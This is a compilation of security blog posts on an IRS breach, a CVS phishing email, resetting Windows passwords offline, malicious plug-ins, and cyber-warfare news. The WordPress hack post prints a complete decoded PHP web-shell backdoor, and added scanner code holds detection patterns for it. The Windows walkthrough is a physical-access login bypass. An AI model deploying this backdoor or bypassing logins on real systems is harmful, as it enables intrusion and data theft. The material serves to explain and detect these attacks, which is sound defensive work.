
IRS Reports 700,000 U.S. Taxpayers Hacked And 47 Million ‘Get Transcripts’ Ordered

Another 390,000 taxpayer accounts have been identified as potentially accessed by thieves that hacked into the IRS’s “Get Transcript” online application, the IRS said Friday, bringing the total number of accounts affected to approximately 724,000.

The breach was discovered last May, when the IRS initially identified possible unauthorized access of about 114,000 taxpayer accounts. Then, last August, the IRS revised that figure to 334,000. The application on the IRS website, launched in January 2014, was intended to allow taxpayers to more easily obtain records of their prior tax filings. It has remained suspended since the data breach was first discovered.

– See more at: http://www.journalofaccountancy.com/news/2016/feb/irs-get-transcript-data-breach-worse-201613967.html



Scam – Attn: Your CVS ExtraCare Card Has Been Updated – Must Confirm

This email contains a link to a possible malware site:


CVS Extra Care Rewards Program
DATE: 1/12/16

IMPORTANT MESSAGE FOR CVS CARD HOLDER: YOUR EMAIL

Your CVS Extra Care Savings & Rewards Card Has Been Updated.

To be sure you keep all of your points that you’ve accumulated over the years shopping at CVS (both market and pharmacy), you must visit the link below to start using your new rewards.

Link REMOVED – Goes to possible malware site
**Reward #3833 will expire on 1/16/16. Don’t Forget!

VirusTotal:

URL Scanner        Result
Sucuri SiteCheck   Malicious site
ParetoLogic        Malware site

Windows Password Recovery: ONTPRE

Offline NT Password & Registry Editor (ONTP&RE)

Did you lock yourself out of your Windows system?  Forgot your Windows password?  What is the best Windows password recovery?

The best way is to have a Windows Recovery disc ready.  But this is something you must do BEFORE you get locked out.


There are tools you can use to get into your system, but the first thing you should try is to log in as “Administrator” with no password.  “Administrator” is a default account on Windows systems.  On Windows 7 it is disabled by default, but if someone has used the account you may be able to use it as a backdoor into the system.

If there is no usable Administrator account and no Windows Recovery disc, you will have to use a Windows password recovery tool.  ONTP&RE is a password recovery tool that allows quick access to Windows systems.

Reset Password : Windows 7

1.  Download ONTP&RE: First, download the Windows password recovery software from pogostick.net: pogostick.net/~pnh/ntpasswd/cd110511.zip

2.  Unzip ONTP&RE:  The files are compressed into one archive named cd110511.zip.  Unzip it.

3.  Create CD with ISO:  Set your CD-burning software to ‘image to disc’ mode and burn the image to the CD.  Each CD burner program is different, so you will have to figure out how to create a CD from the ISO.  Sometimes it’s as easy as double-clicking the ISO, but it depends on the software.

4.  Reboot & Insert:  Make sure your Windows system is able to boot from the CD.  Once the disc is burned, insert it into the CD-ROM drive and reboot your computer.

5.  Computer Boot from CD:  As your computer reboots, keep pressing F2 to enter the BIOS.  Select “Boot Options”.  Some versions of BIOS call this “Boot”, but the idea is the same.  Go into the BIOS and make sure CDROM is at the top of the list of boot options.  This means that the computer looks at the CD first before going to the hard drive.  Instructions for changing the settings are usually listed on the BIOS screen itself.

6.  Boot into ONTP&RE:  Once the BIOS boot option is set, save and exit.  Your system will boot from the ONTP&RE disc and the software will start running.  Just follow the steps.  Press Enter to boot into the “Offline NT Password & Registry Editor” CD.

[Screenshot: Offline NT Password & Registry Editor boot screen]

7.  Select an Account:  It will ask you to select an account.  If you press Enter it will automatically select the [Administrator] account.

*note: Anything in [brackets] is the default value, so if you press Enter it will auto-magically choose that [bracket] value.  It’s a Linux thing; you wouldn’t understand.

If you choose the “Administrator” account, you may need to enable the account first, since the built-in Administrator account is disabled by default in certain versions of Windows.

8.  Enable Built-in Administrator Account:  The Windows account needs to be enabled.  Select option 4, ‘Unlock and enable user account’, and press Enter.

[Screenshot: ONTP&RE user edit menu with option 4, Unlock and enable user account]

9.  Clear (blank) User Password:  After selecting 4 (Unlock and enable user account), you are sent back to the User Edit Menu.  If you want to clear the Administrator password (if it has one), press Enter (or type Administrator), then select 1 and press Enter to clear the user password.

10.  Save Changes:  Once you have made all the changes you want (enabled the Administrator account and cleared any passwords), you are ready for the next step.  Type ‘!’ and press Enter.

[Screenshot: ONTP&RE write-back prompt]

On the screen it asks ‘What to do?’  Press q to quit.  You will see:

Step FOUR:  Writing back changes

“About to write file(s) back.  Do it?”

Press Y and Enter to save the changes.

11.  Last Step:  Press Ctrl-Alt-Del to reboot and eject the CD quickly.  This lets the system boot into Windows from the hard drive.

You can now login as “Administrator” with NO password.

Once you are in as Administrator you can change passwords of any local accounts in Control Panel | Users.
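The procedure above ends with the built-in Administrator account enabled and passwordless, which is exactly the state an attacker with physical access would leave behind. As an added example (not part of the original post), the script below audits that state on a Windows host by parsing the output of the standard `net user` command; the SAMPLE_OUTPUT it ships with is constructed to look like that command's output and is not a real capture.

```python
# Added example (not part of the original post): audit the built-in
# Administrator account that the procedure above leaves enabled with no
# password. It parses the output of the Windows `net user` command; the
# SAMPLE_OUTPUT below is constructed in that shape, not captured from a host.
import re
import subprocess

# Fields of `net user <name>` output that matter for this audit.
FIELDS = ("Account active", "Password required", "Password last set", "Last logon")


def parse_net_user(output):
    """Turn the two-column `net user` listing into a {field: value} dict."""
    fields = {}
    for line in output.splitlines():
        # Column layout: label, a run of two or more spaces, then the value.
        m = re.match(r"^(.+?)\s{2,}(.*?)\s*$", line)
        if m and m.group(1).strip() in FIELDS:
            fields[m.group(1).strip()] = m.group(2).strip()
    return fields


def assess(fields):
    """Return the findings a defender would want flagged (empty list = nothing to report)."""
    findings = []
    if fields.get("Account active", "").lower() == "yes":
        findings.append("built-in Administrator account is enabled")
    if fields.get("Password required", "").lower() == "no":
        # PASSWD_NOTREQD flag: Windows will accept an empty password for this account.
        findings.append("account is allowed to have an empty password")
    return findings


def audit_local_admin(account="Administrator"):
    """Run `net user` on this host (Windows only) and assess the account."""
    proc = subprocess.run(["net", "user", account], capture_output=True, text=True, check=True)
    return assess(parse_net_user(proc.stdout))


# Constructed sample in the shape of `net user Administrator` for an account
# that has been enabled and flagged as not requiring a password.
SAMPLE_OUTPUT = """\
User name                    Administrator
Full Name
Comment                      Built-in account for administering the computer/domain
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/12/2016 9:30:00 AM
Password expires             Never
Password changeable          1/12/2016 9:30:00 AM
Password required            No
User may change password     Yes

Last logon                   Never
The command completed successfully.
"""

if __name__ == "__main__":
    for finding in assess(parse_net_user(SAMPLE_OUTPUT)):
        print("FINDING:", finding)
```

On a real host call audit_local_admin(); an empty list means the account is disabled and still requires a password. A recent "Password last set" on a machine nobody administers is the other thing worth a second look after an unexpected reboot.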

Evil Plug-ins

I love plug-ins! I love them on Firefox, WordPress, Dreamweaver and now on Chrome. It has crossed my mind that some of these plug-ins could be created and distributed by very smart people with criminal or mischievous intent. But the reality of bad plug-ins didn’t hit me until I noticed a link on digg.com about Stealing Logins using Google Chrome Extensions. I am no programmer but understand enough to see how clever it is.

Basically, someone creates an innocent-looking extension or plug-in and distributes it, and the innocent-looking plug-in/extension sends your personal information wherever they like.

How can a person avoid this?! I guess the safest way would be to not use ANY plug-ins and extensions, but that is overkill.
I know that I am pretty paranoid about WordPress extensions/plug-ins, but the open source community is pretty good about peer reviewing and testing some of the more popular plug-ins. When it comes to software I depend heavily on reviews from others who have used the product. If there are no reviews (even on forums or dev/plug-in sites), I usually consider the app too risky.

Sometimes what I do is try the app/extension/plug-in on a site/blog I don’t care as much about. In the case of browser plug-ins, I use a single trusted browser with minimal plug-ins to do important sensitive/personal transactions. Most of the stuff I do on the web does not require so much scrutiny.

Unfortunately, there is always a risk with plug-ins, apps, and extensions. All we can really do is manage the risk, by being careful and suspicious.

Thanks Mr. Grech for the knowledge.

Server at Magic Requires Username Password

The WordPress “Magic” hack!

If you’re getting this message: “The server (your server domain, e.g. DOMAIN.COM) at Magic requires a username and password”, then you likely have infected code in your WordPress blog.

[Screenshot: WordPress “Magic” attack login prompt]

WordPress user Yokima reported this very slick hack.

FIX ACTION:
The fix is to update your blog. This will fix the issue. Make sure you change your password if you actually put your information in that “server at Magic” message box. Although updating the WordPress blog definitely fixes the issue, you may have to reload your plug-ins too, because they may also contain infected code. Doing further research on this matter.

*A similar issue was reported by techartistserver: “BLAH.fuzz.com at Fuzz Access requires a username and password.”

This is what the infected code looks like after the malware injection into your blog... yep... uuugly!

From RocketWood:
We noticed that the code injected into the files was run through an eval and a decode, so we decoded the string and found this PHP code:

{
    if (!function_exists('______safeshell'))
    {
        // Runs a shell command through whichever execution function the host has not disabled.
        function ______safeshell($komut) {
            @ini_restore("safe_mode");
            @ini_restore("open_basedir");
            $disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));
            if (!empty ($komut)) {
                if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {
                    //@ ob_start();
                    @ passthru($komut);
                    //$res = @ ob_get_contents();
                    //@ ob_end_clean();
                }
                elseif (function_exists('system') && !in_array('system', $disable_functions)) {
                    //@ ob_start();
                    @ system($komut);
                    //$res = @ ob_get_contents();
                    //@ ob_end_clean();
                }
                elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {
                    $res = @ shell_exec($komut);
                    echo $res;
                }
                elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {
                    @ exec($komut, $res);
                    $res = join("\n", $res);
                    echo $res, "\n";
                }
                elseif (@ is_resource($f = @ popen($komut, "r"))) {
                    //$res = "";
                    while (!@ feof($f)) {
                        //$res .= @ fread($f, 1024);
                        echo(@ fread($f, 1024));
                    }
                    @ pclose($f);
                }
                else
                {
                    $res = `$komut`;   // backtick (shell) operator; the page's rendering had lost the backticks
                    echo $res;
                }
            }
        }
    };
    // Dispatcher: a request carrying this key selects eval, shell exec, or a raw SQL query.
    if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {
        echo "\n";
        if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {
            eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
        }
        else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {
            ______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
        }
        else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {
            $result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);
            if (!$result)
            {
                echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";
                die();
            }
            else if (is_resource($result))
            {
                $res = array();
                while ($row = mysql_fetch_assoc($result))
                {
                    $res[] = $row;
                };
                mysql_free_result($result);
                echo serialize($res);
                die();
            }
            else
            {
                // $wbdb here is the sample's own typo (not $wpdb); left as found
                echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";
                die();
            }
        };
        echo "\n\n";
        die();
    };
};

P.S.: don’t feel too bad, even the security masters get hacked by malicious S.O.B.’s.
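The decoded sample above gives a defender a few stable strings to hunt for: the ______safeshell helper name, the php_bdb7e9f039f4c7d9100073e131610a87 request key, request data fed straight into eval(), and the eval-around-a-decoder loader RocketWood describes. The scanner below is an added example, not code from the original post or from WordPress; it walks a WordPress directory looking for those indicators. The demo tree and its three file contents are constructed here (the base64 text just decodes to "constructed"), not taken from an infected site.

```python
# Added example, not code from the original post or from WordPress: a small
# scanner that walks a WordPress install looking for the indicators visible
# in the decoded backdoor above. The ______safeshell name and the
# php_bdb7e9f0... request key come from that sample; the eval-of-decode
# pattern is the loader shape the post describes. The demo tree and its
# file contents are constructed here, not taken from an infected site.
import os
import re
import tempfile

INDICATORS = {
    # The injected loader: an eval() wrapped around a decoder call.
    "eval_of_decoded_string": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # Helper name from the decoded payload on the page.
    "safeshell_helper": re.compile(r"______safeshell"),
    # Request key the payload checks before doing anything.
    "backdoor_request_key": re.compile(r"php_bdb7e9f039f4c7d9100073e131610a87"),
    # Request data passed straight into eval().
    "request_param_to_eval": re.compile(r"eval\s*\(.*\$_REQUEST\s*\[", re.I),
}


def scan_file(path):
    """Return the names of the indicators found in one file (empty list if clean)."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except OSError:
        return []
    return [name for name, pattern in INDICATORS.items() if pattern.search(text)]


def scan_tree(root, extensions=(".php",)):
    """Map each flagged file (path relative to root, '/'-separated) to its indicators."""
    report = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(extensions):
                path = os.path.join(dirpath, name)
                hits = scan_file(path)
                if hits:
                    report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report


# Constructed demo files: one clean plugin, one theme file carrying the kind
# of eval/decode loader the post describes, and one dropped file carrying the
# decoded dispatcher's request key.
DEMO_FILES = {
    "wp-content/plugins/hello/hello.php":
        "<?php\n// clean plugin stub\nfunction hello_demo() { return 'Hello'; }\n",
    "wp-content/themes/demo/footer.php":
        "<?php\n/* injected loader shape */\neval(base64_decode('Y29uc3RydWN0ZWQ='));\n",
    "wp-content/uploads/cache.php":
        "<?php\nif (isset($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {\n"
        "    eval(stripslashes($_REQUEST['cmd']));\n}\n",
}


def build_demo_tree():
    """Write the constructed files into a temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="wp-scan-demo-")
    for rel, content in DEMO_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, hits in sorted(scan_tree(build_demo_tree()).items()):
        print(rel, "->", ", ".join(hits))
```

Point scan_tree at the real document root to check an install; the request key is specific to this sample, but the eval-of-decoder and request-into-eval patterns will also catch loaders that have been re-keyed, which is why the post's advice to reinstall plug-ins rather than just the core files is sound.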

Jeff Moss + DHS = Super Security

“Godfather of Hackers” Jeff Moss, founder of the Black Hat and Defcon hacker and security conferences, was sworn in as one of the new members of the Department of Homeland Security’s Advisory Council (HSAC). And we think it’s a shrewd and thoughtful move. Obama seems to be getting serious about cyber security now by hiring “Dark Tangent.”

– on Gizmodo

Jeff Moss is not only a celebrity in the world of hacking, he is also a power broker, a respected force to be reckoned with. I am not going to say that I think he is some sort of cyber mafia boss, but I will say that he could destroy just about anyone with a 100-word post on a forum. Getting “street cred” in the hacker world is something that must be truly earned, usually through technical expertise proven before hundreds or even thousands of your hacker peers and validated by published technical papers, famous or infamous system infiltrations, the discovery of 0-day exploits that make major corporations take notice, or some combination of these.

Jeff has his finger on the pulse of the entire spectrum of hacking.

Jeff is now going to advise the president.

Now that is good judgement.

You Hack US, We Nuke You!

The United States’ top commanding officer for the space and cyber domains told reporters last week that a cyber attack could merit a more conventional military response.

During a press briefing on Thursday, U.S. Air Force General Kevin Chilton, who heads the U.S. Strategic Command, told reporters that top Pentagon advisors would not rule out a physical attack on any force that attacks the United States through the Internet. Currently, the military’s networks are probed thousands of times a day, but the goal of attackers seems to be espionage, not to take down critical networks, he told reporters.

– SecurityFocus

I don’t believe that military force is the equivalent action for a cyber attack. Arrest and/or apprehension is the physical response necessary for criminal hackers attacking from other countries. Cyber counter-attacks are the correct response for government funded & coordinated attacks.

I think if the U.S. reciprocated a cyber attack x10 when other countries are playing little games, we’d get our message across effectively. We should do so in a well-funded and covert way in which the enemy has NO DOUBT that the face slap came from a U.S. hand, but no proof at all, allowing plausible deniability. It should be black-ops hacking: very well coordinated, very well funded and full time.

I don’t think the US can be complacent or recklessly meek in matters of cyber warfare. Instead, it must be fair, quiet and heavy-handed when it comes to one of its most valuable assets: information.

Weaponized Hacking

This is not your momma’s hacking. This is militarized hacking, Pentagon style. It is state funded, with the intent of enabling the killing of people and the breaking of things.

“U.S. Defense Department officials were so impressed with the level of coordination between ground military ops and cyberattacks against strategical targets during the recent conflicts, that they are now looking for ways to weaponize hacking. Aviation Week glanced at such a device and reports that it is being designed to be easily used even by non-techy soldiers.”
– Softpedia

Welcome to the neo-cyber arms race, where uncontrollable cyber weapons can turn off cities and detonate public utility plants at the touch of a button! This is not the beginning of a William Gibson novel, this is not the synopsis of Snow Crash or the theme of a cyberpunk trilogy; this is reality… virtual reality.

On a serious note, I think China has already weaponized hacking. Hopefully, this is not the first time the US has thought about this.

Torpig Botnet Hijacked

Brett Stone-Gross, Marco Cova, Lorenzo Cavallaro, Bob Gilbert, Martin Szydlowski, Richard Kemmerer, Chris Kruegel and Giovanni Vigna of the Security Group in the Department of Computer Science, University of California, Santa Barbara, hacked into a botnet called Torpig.

Torpig gathers credit card numbers, bank account details and other sensitive data and sends it to criminals. The botnet had stolen 70 GB of data.

The security group took advantage of the open, decentralized nature of peer-to-peer to infiltrate it. Victims are infected by drive-by-download attacks.

They use phishing sites and advertise them on Google, Facebook, MySpace and other popular sites. They also use email. To hijack the botnet, the researchers exploited a vulnerability in the way the malware generates the list of domains it contacts.

http://www.cs.ucsb.edu/~seclab/projects/torpig/torpig.pdf

Not becoming a victim in the first place is the ideal situation, however. The researchers concluded that victims of botnets are usually those with poorly maintained machines who choose “easily guessable” passwords. “This is evidence that the malware problem is fundamentally a cultural problem,” reads the report. “Even though people are educated and understand well concepts such as the physical security and the necessary maintenance of a car, they do not understand the consequences of irresponsible behavior when using a computer.” – Jacqui Cheng

Pentagon Hacked Via Major Companies

21 April 2009. Recently hackers got into the Pentagon through its connections to the Northrop and Lockheed networks. The hackers originated from China. China, of course, “opposes and forbids all forms of cyber crimes.”

They stole some data related to the $300 billion Joint Strike Fighter project.

Maybe it’s time to tighten the security between military and civilian enclaves. Just an idea. Realistically, companies with that much involvement in projects like this should have the same level of security as the Pentagon. Otherwise all the Pentagon’s security is useless because of the Northrop/Lockheed backdoor.
